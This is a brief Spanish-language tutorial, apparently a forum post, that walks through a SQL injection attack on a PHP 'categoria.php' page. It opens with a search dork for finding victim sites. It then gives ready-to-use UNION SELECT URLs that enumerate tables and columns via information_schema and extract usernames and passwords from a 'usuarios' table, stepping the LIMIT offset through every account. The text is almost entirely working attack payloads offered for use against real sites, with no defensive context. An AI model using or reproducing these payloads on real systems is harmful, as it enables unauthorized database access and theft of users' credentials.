1.- buscamos victima.
inurl:software/categoria.php?
2.- exploit
+and+1=0
3.- buscamos union select
Citar
4.- buscamos las tablas
Citar
http://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--
5.- buscamos las columnas
Citar
http://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--
6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios.
Citar
http://www.xxxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1--
vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:passpodemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más.